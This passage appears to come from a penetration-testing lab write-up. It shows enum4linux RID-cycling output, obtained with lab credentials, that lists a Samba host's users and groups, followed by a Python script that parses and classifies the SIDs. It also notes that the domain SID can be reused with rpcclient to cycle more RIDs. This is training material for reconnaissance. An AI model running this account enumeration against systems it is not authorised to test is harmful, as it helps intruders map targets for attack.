[+] Enumerating users using SID S-1-22-1 and logon username 'admin', password 'password1'
S-1-22-1-1000 Unix User\shawn (Local User)
S-1-22-1-1001 Unix User\jane (Local User)
S-1-22-1-1002 Unix User\nancy (Local User)
S-1-22-1-1003 Unix User\admin (Local User)
[+] Enumerating users using SID S-1-22-2 and logon username 'admin', password 'password1'
S-1-22-2-1000 Unix Group\admins (Domain Group)
S-1-22-2-1001 Unix Group\Maintainer (Domain Group)
S-1-22-2-1002 Unix Group\Reserved (Domain Group)
S-1-22-2-1003 Unix Group\Testing (Domain Group)
[+] Enumerating users using SID S-1-5-21-3690628376-3985617143-2159776750 and logon username 'admin', password 'password1'
S-1-5-21-3690628376-3985617143-2159776750-501 SAMBA-RECON-BRUTE\nobody (Local User)
S-1-5-21-3690628376-3985617143-2159776750-513 SAMBA-RECON-BRUTE\None (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1000 SAMBA-RECON-BRUTE\shawn (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1001 SAMBA-RECON-BRUTE\jane (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1002 SAMBA-RECON-BRUTE\nancy (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1003 SAMBA-RECON-BRUTE\admin (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1004 SAMBA-RECON-BRUTE\Maintainer (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1005 SAMBA-RECON-BRUTE\Reserved (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1006 SAMBA-RECON-BRUTE\Testing (Local Group)
enum4linux complete on Tue Oct 25 11:02:17 2022
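To answer the last lab question without reading the SIDs off the screen, here is an added example (my code, not enum4linux's) that parses the RID-cycling lines above and decodes what each SID family means: S-1-22-1-<uid> and S-1-22-2-<gid> are Samba's Unix User and Unix Group SIDs, so the last component is the POSIX uid or gid on the server; S-1-5-32-<rid> is BUILTIN; and S-1-5-21-<three 32-bit values>-<rid> is the machine's own domain SID, where RIDs below 1000 carry a fixed meaning (500 Administrator, 501 Guest, 512 Domain Admins, 513 Domain Users). That fixed range is why enum4linux's default RID range starts at 500, and why the Unix nobody account shows up as RID 501 and the None group as 513 in the output above. The sample lines are copied from that output; the well-known RID table is standard Windows/Samba knowledge rather than something the page lists.

```python
"""Decode the SIDs that enum4linux's RID cycling prints.

Added example for this page (not enum4linux's or the course's code). The
SAMPLE lines are copied from the RID-cycling output above; the well-known
RID table is standard Windows/Samba knowledge, not something the page lists.
"""
import re
from collections import namedtuple

Record = namedtuple("Record", "sid domain name kind")

# Matches e.g. "S-1-22-1-1000 Unix User\shawn (Local User)"
_LINE = re.compile(
    r"^(?P<sid>S-1-\d+(?:-\d+)+)\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>[^)]+)\)\s*$"
)

# RIDs that mean the same thing in every domain (Samba emulates them too).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests"}


def parse_rid_cycling(text: str) -> list[Record]:
    out = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            out.append(Record(m["sid"], m["domain"], m["name"], m["kind"]))
    return out


def classify(sid: str):
    """Return (kind, number) for the SID families Samba hands out:
    S-1-22-1-<uid> Unix user, S-1-22-2-<gid> Unix group,
    S-1-5-32-<rid> BUILTIN, S-1-5-21-<a>-<b>-<c>-<rid> domain/machine."""
    parts = [int(p) for p in sid.split("-")[2:]]   # drop the 'S' and revision '1'
    authority, subs = parts[0], parts[1:]
    if authority == 22 and len(subs) == 2 and subs[0] in (1, 2):
        return ("unix-user" if subs[0] == 1 else "unix-group", subs[1])
    if authority == 5 and len(subs) == 2 and subs[0] == 32:
        return ("builtin", subs[1])
    if authority == 5 and len(subs) == 5 and subs[0] == 21:
        return ("domain", subs[4])
    return ("other", subs[-1] if subs else None)


def unix_user_sids(records) -> dict:
    """Answer to the lab's last question: user name -> S-1-22-1-<uid>."""
    return {r.name: r.sid for r in records if classify(r.sid)[0] == "unix-user"}


def domain_sid(records):
    """The S-1-5-21-... prefix shared by all domain records (None if absent)."""
    for r in records:
        if classify(r.sid)[0] == "domain":
            return r.sid.rsplit("-", 1)[0]
    return None


def well_known(records):
    """Domain records whose RID has a fixed meaning, e.g. 501 -> Guest."""
    hits = []
    for r in records:
        kind, rid = classify(r.sid)
        if kind == "domain" and rid in WELL_KNOWN_RIDS:
            hits.append((r.name, rid, WELL_KNOWN_RIDS[rid]))
    return hits


# Copied from the enum4linux RID-cycling output on this page.
SAMPLE = """
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
S-1-5-32-547 BUILTIN\\Power Users (Local Group)
S-1-22-1-1000 Unix User\\shawn (Local User)
S-1-22-1-1001 Unix User\\jane (Local User)
S-1-22-1-1002 Unix User\\nancy (Local User)
S-1-22-1-1003 Unix User\\admin (Local User)
S-1-22-2-1000 Unix Group\\admins (Domain Group)
S-1-22-2-1003 Unix Group\\Testing (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-501 SAMBA-RECON-BRUTE\\nobody (Local User)
S-1-5-21-3690628376-3985617143-2159776750-513 SAMBA-RECON-BRUTE\\None (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1000 SAMBA-RECON-BRUTE\\shawn (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1006 SAMBA-RECON-BRUTE\\Testing (Local Group)
"""

if __name__ == "__main__":
    recs = parse_rid_cycling(SAMPLE)
    print("domain SID:", domain_sid(recs))
    for name, sid in unix_user_sids(recs).items():
        print(f"{name:<6} {sid}  uid={classify(sid)[1]}")
    print("well-known RIDs:", well_known(recs))
```

Pipe the full enum4linux -r output through parse_rid_cycling and the Unix uids fall out directly from the S-1-22-1 SIDs; the domain SID is the value you would reuse with rpcclient's lookupsids when cycling a wider RID range than enum4linux's default.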
Solution
The solution to this lab is available in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-556.pdf